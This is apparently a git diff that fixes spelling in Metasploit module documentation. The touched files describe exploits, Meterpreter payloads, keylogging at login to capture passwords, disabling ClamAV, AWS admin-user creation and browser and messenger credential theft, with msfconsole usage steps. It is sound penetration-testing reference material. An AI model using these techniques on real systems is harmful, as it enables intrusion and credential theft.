Correct response received => Data send successfully [*] Sending stage (179779 bytes) to 10.66.75.212 [*] 10.66.75.212:5099 - Command Stager progress - 100.00% done (102292/102292 bytes) [!] 10.66.75.212:5099 - The payload is left on the client in the %TEMP% Folder of the corresponding user. diff --git a/documentation/modules/exploit/windows/misc/cloudme_sync.md b/documentation/modules/exploit/windows/misc/cloudme_sync.md index 75fcf7c8618c..eb1dd285f084 100644 --- a/documentation/modules/exploit/windows/misc/cloudme_sync.md +++ b/documentation/modules/exploit/windows/misc/cloudme_sync.md 
@@ -15,7 +15,7 @@ Because neither functions check the max size against the actual amount of space ## Verification Steps 1. Install CloudMe for Desktop version `v1.10.9` - 2. Start the applicaton (you don't need to create an account) + 2. Start the application (you don't need to create an account) 3. Start `msfconsole` 4. Do `use exploit/windows/misc/cloudme_sync` 5. Do `set RHOST ip` diff --git a/documentation/modules/exploit/windows/misc/hp_imc_dbman_restartdb_unauth_rce.md b/documentation/modules/exploit/windows/misc/hp_imc_dbman_restartdb_unauth_rce.md index 0d1848d26bf9..d8c62b5be97b 100644 --- a/documentation/modules/exploit/windows/misc/hp_imc_dbman_restartdb_unauth_rce.md +++ b/documentation/modules/exploit/windows/misc/hp_imc_dbman_restartdb_unauth_rce.md @@ -1,6 +1,6 @@ ## Description - This module exploits a remote command execution vulnerablity in Hewlett Packard Enterprise Intelligent Management Center before version 7.3 E0504P04. + This module exploits a remote command execution vulnerability in Hewlett Packard Enterprise Intelligent Management Center before version 7.3 E0504P04. The dbman service allows unauthenticated remote users to restart a user-specified database instance (OpCode 10008), however the instance ID is not sanitized, allowing execution of arbitrary operating system commands as SYSTEM. This service listens on TCP port 2810 by default. diff --git a/documentation/modules/exploit/windows/misc/hp_imc_dbman_restoredbase_unauth_rce.md b/documentation/modules/exploit/windows/misc/hp_imc_dbman_restoredbase_unauth_rce.md index ec60fe489258..ec8f7497aa3c 100644 --- a/documentation/modules/exploit/windows/misc/hp_imc_dbman_restoredbase_unauth_rce.md +++ b/documentation/modules/exploit/windows/misc/hp_imc_dbman_restoredbase_unauth_rce.md 
@@ -1,6 +1,6 @@ ## Description - This module exploits a remote command execution vulnerablity in Hewlett Packard Enterprise Intelligent Management Center before version 7.3 E0504P04. + This module exploits a remote command execution vulnerability in Hewlett Packard Enterprise Intelligent Management Center before version 7.3 E0504P04. The dbman service allows unauthenticated remote users to restore a user-specified database (OpCode 10007), however the database connection username is not sanitized resulting in command injection, allowing execution of arbitrary operating system commands as SYSTEM. This service listens on TCP port 2810 by default. diff --git a/documentation/modules/exploit/windows/misc/hp_loadrunner_magentproc_cmdexec.md b/documentation/modules/exploit/windows/misc/hp_loadrunner_magentproc_cmdexec.md index 2d5b5f78f827..48807983dc61 100644 --- a/documentation/modules/exploit/windows/misc/hp_loadrunner_magentproc_cmdexec.md +++ b/documentation/modules/exploit/windows/misc/hp_loadrunner_magentproc_cmdexec.md @@ -2,7 +2,7 @@ HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution (CVE-2010-1549) -This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50 and also +This module exploits a remote command execution vulnerability in HP LoadRunner before 9.50 and also HP Performance Center before 9.50. By sending a specially crafted packet, an attacker can execute commands remotely. The service is vulnerable provided the Secure Channel feature is disabled (default). diff --git a/documentation/modules/exploit/windows/tftp/distinct_tftp_traversal.md b/documentation/modules/exploit/windows/tftp/distinct_tftp_traversal.md index ab2b90f51a12..bb1f5f79771e 100644 --- a/documentation/modules/exploit/windows/tftp/distinct_tftp_traversal.md +++ b/documentation/modules/exploit/windows/tftp/distinct_tftp_traversal.md 
@@ -20,7 +20,7 @@ 3. Select `Configure` -> `TFTP` from the application menu 4. Set the root directory to `C:\\some\\path` 5. Check `Enable TFTP Server` - 6. Pres `OK` to apply settings + 6. Press `OK` to apply settings Exploitation: diff --git a/documentation/modules/payload/windows/meterpreter/reverse_https.md b/documentation/modules/payload/windows/meterpreter/reverse_https.md index 55f2d9eb1945..0a9c1e33192c 100644 --- a/documentation/modules/payload/windows/meterpreter/reverse_https.md +++ b/documentation/modules/payload/windows/meterpreter/reverse_https.md @@ -484,7 +484,7 @@ OPTIONS: -h Help menu -t Retry total time (seconds) -w Retry wait time (seconds) - -x Expiration timout (seconds) + -x Expiration timeout (seconds) ``` To see the current timeout configuration, you can use the ```get_timeouts``` command: diff --git a/documentation/modules/payload/windows/meterpreter/reverse_tcp.md b/documentation/modules/payload/windows/meterpreter/reverse_tcp.md index a6d3b90b67ee..6b4f8ae90c94 100644 --- a/documentation/modules/payload/windows/meterpreter/reverse_tcp.md +++ b/documentation/modules/payload/windows/meterpreter/reverse_tcp.md @@ -343,7 +343,7 @@ meterpreter > One great feature of the extension is clipboard management. The Windows clipboard is interesting because it can store anything that is sensitive, such as files, user names, and passwords, but it is not well protected. -For example, a password manager is a popular tool to store encryped passwords. It allows the user +For example, a password manager is a popular tool to store encrypted passwords. It allows the user to create complex passwords without the need to memorize any of them. All the user needs to do is open the password manager, retrieve the password for a particular account by copying it, and then paste it on a login page. 
@@ -353,7 +353,7 @@ in the operating system's clipboard. As an attacker, you can take advantage of t clipboard monitor from Meterpreter/extapi, and then collect whatever the user copies. To read whatever is currently stored in the target's clipboard, you can use the clipboard_get_data -commnad: +command: ``` meterpreter > clipboard_get_data @@ -590,7 +590,7 @@ OPTIONS: -h Help menu -t Retry total time (seconds) -w Retry wait time (seconds) - -x Expiration timout (seconds) + -x Expiration timeout (seconds) ``` To see the current timeout configuration, you can use the ```get_timeouts``` command: diff --git a/documentation/modules/post/android/gather/sub_info.md b/documentation/modules/post/android/gather/sub_info.md index cf5d4868f422..e1b20ec542dd 100644 --- a/documentation/modules/post/android/gather/sub_info.md +++ b/documentation/modules/post/android/gather/sub_info.md @@ -10,7 +10,7 @@ 3. Do: `use android/gather/sub_info` 4. Do: `set SESSION ` 5. Do: `run` - 6. You should be able to see the extracted subsriber information. + 6. You should be able to see the extracted subscriber information. ## Options diff --git a/documentation/modules/post/hardware/automotive/canprobe.md b/documentation/modules/post/hardware/automotive/canprobe.md index b3d72de70716..08bcc5815fe5 100644 --- a/documentation/modules/post/hardware/automotive/canprobe.md +++ b/documentation/modules/post/hardware/automotive/canprobe.md @@ -1,5 +1,5 @@ A basic fuzzer for CAN IDs. It can scan through CAN IDs and probes each data section -with a set value. The defualt is 0xFF. It can also iterate through all the possible +with a set value. The default is 0xFF. It can also iterate through all the possible values for each byte as well. It has no concept of what is going on and makes no attempt to check for return packets. 
@@ -15,7 +15,7 @@ attempt to check for return packets. **FUZZ** - If true the data segment will iterate through all possiblities (0-255). + If true the data segment will iterate through all possibilities (0-255). **PROBEVALUE** diff --git a/documentation/modules/post/hardware/automotive/getvinfo.md b/documentation/modules/post/hardware/automotive/getvinfo.md index c4a64602b6b6..2a9140e0d052 100644 --- a/documentation/modules/post/hardware/automotive/getvinfo.md +++ b/documentation/modules/post/hardware/automotive/getvinfo.md @@ -42,7 +42,7 @@ PIDs to ASCII. ``` hwbridge > run post/hardware/automotive/getvinfo CANBUS=can2 -[*] Avaiable PIDS for pulling realitme data: 46 pids +[*] Available PIDS for pulling realitme data: 46 pids [*] [1, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13, 14, 15, 16, 17, 19, 20, 21, 24, 25, 28, 31, 32, 32, 33, 44, 45, 46, 47, 48, 49, 50, 51, 60, 61, 64, 65, 66, 67, 68, 69, 70, 71, 73, 74, 76] [*] MIL (Engine Light) : OFF [*] Number of DTCs: 0 diff --git a/documentation/modules/post/linux/gather/hashdump.md b/documentation/modules/post/linux/gather/hashdump.md index 5fcec802b516..748e0ccf364b 100644 --- a/documentation/modules/post/linux/gather/hashdump.md +++ b/documentation/modules/post/linux/gather/hashdump.md @@ -53,7 +53,7 @@ msf post(hashdump) > exploit [*] Post module execution completed ``` - This module only works when you are root or have root permisions. If you only have user permission, expect feedback: + This module only works when you are root or have root permissions. If you only have user permission, expect feedback: ``` msf > use auxiliary/scanner/ssh/ssh_login diff --git a/documentation/modules/post/linux/manage/disable_clamav.md b/documentation/modules/post/linux/manage/disable_clamav.md index 0f59dd456aa7..c468676c494c 100644 --- a/documentation/modules/post/linux/manage/disable_clamav.md +++ b/documentation/modules/post/linux/manage/disable_clamav.md 
@@ -4,7 +4,7 @@ ClamAV uses a Unix socket that allows non-privileged users to interact with the However, no additional checks are required to trigger ClamAV's shutdown. ## Verification Steps -### Shuting off ClamAV +### Shutting off ClamAV 1. Launch `msfconsole` 2. Get a Meterpreter shell on a Linux host that's also running ClamAV. 3. Do: `use post/linux/manage/disable_clamav` diff --git a/documentation/modules/post/multi/escalate/aws_create_iam_user.md b/documentation/modules/post/multi/escalate/aws_create_iam_user.md index e738a62b0847..57fcf2fb74fe 100644 --- a/documentation/modules/post/multi/escalate/aws_create_iam_user.md +++ b/documentation/modules/post/multi/escalate/aws_create_iam_user.md @@ -18,13 +18,13 @@ allowed to make. This module depends on administrators being lazy and not using the least privileges possible. We often see instances assigned `*.*` roles that allow any user on the instance to make any API call including creating admin users. -When this occours, a user with long lived credentials can be created and calls +When this occurs, a user with long lived credentials can be created and calls against the AWS API can be made from anywhere on the Internet. Once an account is taken over in this manner instances can be spun up, other users can be locked out, networks can be traversed, and many other dangeous things can happen. Only on rare cases should hosts have the following privileges, these should be -restriced. +restricted. * iam:CreateUser * iam:CreateGroup @@ -158,7 +158,7 @@ Module options (post/multi/escalate/aws_create_iam_user): Here we are assuming that we have taken over a host having an instance profile with overly permissive access. Once a session is established, we can load -`aws_create_iam_user` and specify a meterpreter sesssion, +`aws_create_iam_user` and specify a meterpreter session, e.g., `SESSION 1` and run the exploit. ``` 
diff --git a/documentation/modules/post/multi/gather/enum_hexchat.md b/documentation/modules/post/multi/gather/enum_hexchat.md index 599bbd78b5df..22de32e8977e 100644 --- a/documentation/modules/post/multi/gather/enum_hexchat.md +++ b/documentation/modules/post/multi/gather/enum_hexchat.md @@ -43,7 +43,7 @@ Only download the chat logs. ### CONFIGS -Only download teh config files. +Only download the config files. ## Options diff --git a/documentation/modules/post/multi/gather/unix_cached_ad_hashes.md b/documentation/modules/post/multi/gather/unix_cached_ad_hashes.md index 6653fd27a2f2..a212fb3c4963 100644 --- a/documentation/modules/post/multi/gather/unix_cached_ad_hashes.md +++ b/documentation/modules/post/multi/gather/unix_cached_ad_hashes.md @@ -35,7 +35,7 @@ * /var/lib/samba/private/secrets.tdb * /var/lib/samba/passdb.tdb - Use tdbdump to extract structed data from these files (`tdbdump #(unknown)`), and search for the phrase + Use tdbdump to extract structured data from these files (`tdbdump #(unknown)`), and search for the phrase `cachedPassword`. The hash should be in the same format as hashes in /etc/shadow (e.g. `$6$...`). JtR can natively crack these hashes. @@ -46,7 +46,7 @@ * /var/lib/sss/db/cache_* - Use tdbdump to extract structed data from these files (`tdbdump #(unknown)`), and search for the phrase + Use tdbdump to extract structured data from these files (`tdbdump #(unknown)`), and search for the phrase `cachedPassword`. The hash should be in the same format as hashes in /etc/shadow (e.g. `$6$...`). JtR can natively crack these hashes. diff --git a/documentation/modules/post/multi/manage/open.md b/documentation/modules/post/multi/manage/open.md index ad26c34bb49e..2330b33a055f 100644 --- a/documentation/modules/post/multi/manage/open.md +++ b/documentation/modules/post/multi/manage/open.md 
@@ -21,4 +21,4 @@ The following platforms are supported: **URI** -The URI that should be passed to the opening command, can be a webiste or a file. +The URI that should be passed to the opening command, can be a website or a file. diff --git a/documentation/modules/post/multi/manage/play_youtube.md b/documentation/modules/post/multi/manage/play_youtube.md index 16c5800a6346..4890290c3b0e 100644 --- a/documentation/modules/post/multi/manage/play_youtube.md +++ b/documentation/modules/post/multi/manage/play_youtube.md @@ -5,14 +5,14 @@ compromised host. **EMBED** -Whether or not to use the `/embed` YouTube URL. The embeded version provides a +Whether or not to use the `/embed` YouTube URL. The embedded version provides a clean interface and will start playing in fullscreen but is not compatible with all YouTube videos, for example Rick Astley - Never Gonna Give You Up (VID: [`dQw4w9WgXcQ`][1]) is not compatible. While the non-embeded version has greater compatibility, there is a chance that an advertisement may be played before the video. It is recommended to use the -embeded version when the video is compatible. +embedded version when the video is compatible. **VID** diff --git a/documentation/modules/post/osx/gather/gitignore.md b/documentation/modules/post/osx/gather/gitignore.md index 0de945114234..d5ed085c1a0a 100644 --- a/documentation/modules/post/osx/gather/gitignore.md +++ b/documentation/modules/post/osx/gather/gitignore.md @@ -13,7 +13,7 @@ as well as retrieves the contents of files found in the gitignore. 4. Do: `set session #` 5. Do: `set mode 1` 5. Do: `run` - 6. You should see a list of all gitignore files with absolute path located recurively from the users'r home directory + 6. You should see a list of all gitignore files with absolute path located recursively from the users'r home directory Retrieve gitignore files: 7. Do: `set mode 2` 
diff --git a/documentation/modules/post/windows/capture/keylog_recorder.md b/documentation/modules/post/windows/capture/keylog_recorder.md index 57c3f5a1a6aa..7701620a7c19 100644 --- a/documentation/modules/post/windows/capture/keylog_recorder.md +++ b/documentation/modules/post/windows/capture/keylog_recorder.md @@ -10,11 +10,11 @@ This module captures keystrokes from a Windows target and saves them to a text f - **INTERVAL** - The interval in seconds that the module uses for recording keystrokes. The log file goes to a new line at the end of each interval. Default value is 5 seconds. -- **LOCKSCREEN** - This option locks the screen of the target when set to TRUE. CAPTURE_TYPE must be set to winlogon. MIGRATE must be set to TRUE or the session must already be in winlogon.exe. Defalt value is FALSE. +- **LOCKSCREEN** - This option locks the screen of the target when set to TRUE. CAPTURE_TYPE must be set to winlogon. MIGRATE must be set to TRUE or the session must already be in winlogon.exe. Default value is FALSE. - **MIGRATE** - This option migrates the session based on the CAPTURE_TYPE. Explorer.exe for explorer, winlogon.exe for winlogon, or a specified PID for pid. Default value is FALSE. -- **PID** - The PID of a process to migrate the session into. CAPTURE_TYPE of pid must be set, and the sepecified PID must exist on the target machine. +- **PID** - The PID of a process to migrate the session into. CAPTURE_TYPE of pid must be set, and the specified PID must exist on the target machine. - **SESSION** - The session to run the module on. 
@@ -26,11 +26,11 @@ This module captures keystrokes from a Windows target and saves them to a text f The Meterpreter session must be located in an appropriate process for keystroke recording to work properly. This is described in the below-listed capture types. This module can migrate the session if MIGRATE is set to TRUE. If winlogon or PID migration fails, the module will exit. Set MIGRATE to FALSE if migration will be performed manually or through another module. ### Capture Types -- **Explorer.exe** - __Session must be in explorer.exe__ - The most common capture type. Keystrokes are recorded from most user level applications. Applications running at an elevated level will likely not get recorded. **NOTE: Sessions running with elevated privileges are downgraded to user level when migrated into explorer.exe.** It is recommended that a second session be opened for keystroke recording if elevated priveledges are to be maintained. +- **Explorer.exe** - __Session must be in explorer.exe__ - The most common capture type. Keystrokes are recorded from most user level applications. Applications running at an elevated level will likely not get recorded. **NOTE: Sessions running with elevated privileges are downgraded to user level when migrated into explorer.exe.** It is recommended that a second session be opened for keystroke recording if elevated privileges are to be maintained. - **Winlogon.exe** - __Session must be in winlogon.exe__ - Administrator or SYSTEM rights are required to migrate to winlogon.exe. Keylogging from this process records usernames and passwords as users log in. This capture type does not record keystrokes from any other process. Setting LOCKSCREEN to true locks Windows when the module is executed. This forces the user to unlock the computer, and their password is captured. 
-- **PID** - __Session must be in the specific process to be recorded.__ - This option is useful for recording keystrokes in applications or process that run with elevated priveledges. However, admin or SYSTEM rights are required to migrate to these processes. Only keystrokes from the specified process are recorded. +- **PID** - __Session must be in the specific process to be recorded.__ - This option is useful for recording keystrokes in applications or process that run with elevated privileges. However, admin or SYSTEM rights are required to migrate to these processes. Only keystrokes from the specified process are recorded. ## Running Module as a Job It is recommended to run this module as a job using: `exploit -j` or `run -j`. As a job, the module runs in the background preventing it from tying up the Framework's user interface. To stop capturing keystrokes, kill the job using `jobs -k`. The module records the last few keystrokes before exit. Stopping the job can take up to 30 seconds. If the session is killed, the key log job shuts down automatically. diff --git a/documentation/modules/post/windows/escalate/unmarshal_cmd_exec.md b/documentation/modules/post/windows/escalate/unmarshal_cmd_exec.md index f1df769ae6ac..ebd3506da8dd 100644 --- a/documentation/modules/post/windows/escalate/unmarshal_cmd_exec.md +++ b/documentation/modules/post/windows/escalate/unmarshal_cmd_exec.md @@ -23,7 +23,7 @@ If you want to confirm the vulnerability before you add user or perform any othe Confirmation: Then go to meterpreter session and confirm running process (ps) -If you see notepad.exe running as SYSYEM then that is as indication of vulnerable system. +If you see notepad.exe running as SYSTEM then that is as indication of vulnerable system. ## Options diff --git a/documentation/modules/post/windows/gather/bitlocker_fvek.md b/documentation/modules/post/windows/gather/bitlocker_fvek.md index cbc7ade433d3..0f7fedfc25b0 100644 
--- a/documentation/modules/post/windows/gather/bitlocker_fvek.md +++ b/documentation/modules/post/windows/gather/bitlocker_fvek.md @@ -38,7 +38,7 @@ This module enumerates ways to decrypt a Bitlocker volume and if a recovery key DRIVE_LETTER => c msf post(windows/gather/bitlocker_fvek) > run - [+] Successfuly opened Disk 0 + [+] Successfully opened Disk 0 [*] Trying to gather a recovery key [+] Recovery key found : 579744-627517-149402-208362-055022-542289-041470-364089 [*] The recovery key derivation usually take 20 seconds... diff --git a/documentation/modules/post/windows/gather/bloodhound.md b/documentation/modules/post/windows/gather/bloodhound.md index b62c71314b72..7018c996675d 100644 --- a/documentation/modules/post/windows/gather/bloodhound.md +++ b/documentation/modules/post/windows/gather/bloodhound.md @@ -1,7 +1,7 @@ ## Vulnerable Application This module will execute the BloodHound C# Ingestor (aka SharpHound) to gather sessions, local admin, domain trusts and more. -With this information BloodHound will easily identify highly complex privilage elevation attack paths that would otherwise be +With this information BloodHound will easily identify highly complex privilege elevation attack paths that would otherwise be impossible to quickly identify within an Active Directory environment. This module can take several/many minutes to run due to the volume of data being collected. diff --git a/documentation/modules/post/windows/gather/credentials/aim.md b/documentation/modules/post/windows/gather/credentials/aim.md index db1106e16c5c..3c6939ec5dcb 100644 --- a/documentation/modules/post/windows/gather/credentials/aim.md +++ b/documentation/modules/post/windows/gather/credentials/aim.md 
@@ -25,9 +25,9 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. diff --git a/documentation/modules/post/windows/gather/credentials/chrome.md b/documentation/modules/post/windows/gather/credentials/chrome.md index c81eb09e53d6..748c7dcbb99c 100644 --- a/documentation/modules/post/windows/gather/credentials/chrome.md +++ b/documentation/modules/post/windows/gather/credentials/chrome.md @@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ### Default Output 
diff --git a/documentation/modules/post/windows/gather/credentials/comodo.md b/documentation/modules/post/windows/gather/credentials/comodo.md index 0bdf413db0b4..3022a0a91d18 100644 --- a/documentation/modules/post/windows/gather/credentials/comodo.md +++ b/documentation/modules/post/windows/gather/credentials/comodo.md @@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ### Default Output diff --git a/documentation/modules/post/windows/gather/credentials/coolnovo.md b/documentation/modules/post/windows/gather/credentials/coolnovo.md index a48a0bdf18ca..8e9c5e8891a7 100644 --- a/documentation/modules/post/windows/gather/credentials/coolnovo.md +++ b/documentation/modules/post/windows/gather/credentials/coolnovo.md 
@@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ``` diff --git a/documentation/modules/post/windows/gather/credentials/digsby.md b/documentation/modules/post/windows/gather/credentials/digsby.md index a94c0fef3025..4f4ffc09493f 100644 --- a/documentation/modules/post/windows/gather/credentials/digsby.md +++ b/documentation/modules/post/windows/gather/credentials/digsby.md @@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ``` 
diff --git a/documentation/modules/post/windows/gather/credentials/flock.md b/documentation/modules/post/windows/gather/credentials/flock.md index 708b1677ada3..bb094112eff7 100644 --- a/documentation/modules/post/windows/gather/credentials/flock.md +++ b/documentation/modules/post/windows/gather/credentials/flock.md @@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ### Default Output diff --git a/documentation/modules/post/windows/gather/credentials/gadugadu.md b/documentation/modules/post/windows/gather/credentials/gadugadu.md index 890412772aaa..e80321715085 100644 --- a/documentation/modules/post/windows/gather/credentials/gadugadu.md +++ b/documentation/modules/post/windows/gather/credentials/gadugadu.md 
@@ -25,10 +25,10 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. diff --git a/documentation/modules/post/windows/gather/credentials/icq.md b/documentation/modules/post/windows/gather/credentials/icq.md index b9765053f664..c5b7745d9186 100644 --- a/documentation/modules/post/windows/gather/credentials/icq.md +++ b/documentation/modules/post/windows/gather/credentials/icq.md @@ -25,10 +25,10 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. 
diff --git a/documentation/modules/post/windows/gather/credentials/ie.md b/documentation/modules/post/windows/gather/credentials/ie.md index 754f6937560b..f13d41fb2af3 100644 --- a/documentation/modules/post/windows/gather/credentials/ie.md +++ b/documentation/modules/post/windows/gather/credentials/ie.md @@ -25,9 +25,9 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. \ No newline at end of file +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. \ No newline at end of file diff --git a/documentation/modules/post/windows/gather/credentials/incredimail.md b/documentation/modules/post/windows/gather/credentials/incredimail.md index 58bf018d1cfe..21b658e9038d 100644 --- a/documentation/modules/post/windows/gather/credentials/incredimail.md +++ b/documentation/modules/post/windows/gather/credentials/incredimail.md 
@@ -23,8 +23,8 @@ Users can set their own regular expressions so that it could be applied for the By default verbose is turned off. When turned on, the module will show information on files which aren't extracted and information that is not directly related to the artifact output. ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. diff --git a/documentation/modules/post/windows/gather/credentials/kakaotalk.md b/documentation/modules/post/windows/gather/credentials/kakaotalk.md index c918c0eedba9..21ce09231cf4 100644 --- a/documentation/modules/post/windows/gather/credentials/kakaotalk.md +++ b/documentation/modules/post/windows/gather/credentials/kakaotalk.md 
@@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ### Default Output diff --git a/documentation/modules/post/windows/gather/credentials/kmeleon.md b/documentation/modules/post/windows/gather/credentials/kmeleon.md index c5ce252a930d..4ee887430026 100644 --- a/documentation/modules/post/windows/gather/credentials/kmeleon.md +++ b/documentation/modules/post/windows/gather/credentials/kmeleon.md 
@@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ### Default Output diff --git a/documentation/modules/post/windows/gather/credentials/line.md b/documentation/modules/post/windows/gather/credentials/line.md index 171d692455f0..3040d715fdaa 100644 --- a/documentation/modules/post/windows/gather/credentials/line.md +++ b/documentation/modules/post/windows/gather/credentials/line.md 
@@ -25,12 +25,12 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. ## Example Run ### Default Output diff --git a/documentation/modules/post/windows/gather/credentials/maxthon.md b/documentation/modules/post/windows/gather/credentials/maxthon.md index 01d322665c3c..0110723de137 100644 --- a/documentation/modules/post/windows/gather/credentials/maxthon.md +++ b/documentation/modules/post/windows/gather/credentials/maxthon.md @@ -25,10 +25,10 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. 
diff --git a/documentation/modules/post/windows/gather/credentials/miranda.md b/documentation/modules/post/windows/gather/credentials/miranda.md index 86706043cb7e..0df0cae0215a 100644 --- a/documentation/modules/post/windows/gather/credentials/miranda.md +++ b/documentation/modules/post/windows/gather/credentials/miranda.md @@ -25,9 +25,9 @@ By default verbose is turned off. When turned on, the module will show informati ### STORE_LOOT -This option is turned on by default and saves the stolen artifcats/files on the local machine, +This option is turned on by default and saves the stolen artifacts/files on the local machine, this is required for also extracting credentials from files using regexp, JSON, XML, and SQLite queries. ### EXTRACT_DATA -This option is turned on by defalt and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. +This option is turned on by default and will perform the data extraction using the predefined regular expression. The 'Store loot' options must be turned on in order for this to take work. diff --git a/documentation/modules/post/windows/gather/credentials/opera.md b/documentation/modules/post/windows/gather/credentials/opera.md index 6e079942d142..6ccfbf87da07 100644 --- a/documentation/modules/post/windows/gather/credentials/opera.md +++ b/documentation/modules/post/windows/gather/credentials/opera.md 
